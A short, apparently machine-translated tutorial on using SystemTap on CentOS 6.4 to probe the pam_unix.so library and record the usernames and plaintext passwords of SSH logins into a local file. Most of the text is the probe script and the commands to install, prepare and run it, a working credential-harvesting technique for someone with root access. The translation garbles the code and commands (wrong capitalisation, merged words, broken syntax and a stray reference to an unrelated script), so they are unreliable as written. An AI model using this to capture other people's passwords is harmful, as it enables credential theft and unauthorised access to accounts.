Use systemtap in CentOS to capture the username and password for ssh Login
Systemtap is a very powerful kernel debugging tool that can debug many issues about the kernel layer. In Linux, the PAM module detects user information and authentication information to determine whether a user can log on to the system. With this knowledge point, use systemtap to capture the function calls of the dynamic library file pam_unix.so, obtain the user name and password used for ssh remote logon.
Test environment: CentOS6.432bit
Kernel version: 2.6.32-358. el6.i686
First install the following rpm package
Yum -- releasever = 6.4 update
Yuminstall-ysystemtap
Debuginfo-install $ (rpm-qf/lib/security/pam_unix.so)
Create a file and write the following code
Touch/root/capture_pass.stpClick (here) to fold or open
- #! /Usr/bin/stap
- Global username, pass, isSuccRet = 1;
- Probe process ("/lib/security/pam_unix.so"). function ("_ unix_verify_password ")
- {
- Username = user_string ($ name );
- Pass = user_string ($ p );
- }
- Probe process ("/lib/security/pam_unix.so"). function ("_ unix_verify_password"). return
- {
- If ($ return = 0)
- {
- Printf ("User: % s \ nPassword: % s \ n", username, pass );
- IsSuccRet = 0;
- }
- }
- Probe process ("/lib/security/pam_unix.so"). function ("pam_sm_open_session ")
- {
- If (isSuccRet! = 0)
- {
- Printf ("Login via ssh service. \ n \ User: % s \ nPassword: % s \ n", username, pass );
- }
- IsSuccRet = 1;
- }
Grant executable permissions
Chmod + xcapture_pass.stp
Create a password record file
Touchpassword.txt
Execute the systemstap script
Stapcapture_pass.stp-opassword.txt
Execute the capture_pass.stp script locally and log on to the system remotely through ssh. Even if the first logon fails, no error password is recorded. After success, the ctlw.c's script is run and password.txt is captured. Systemstap is a powerful tool, so it can only be used by a Super User.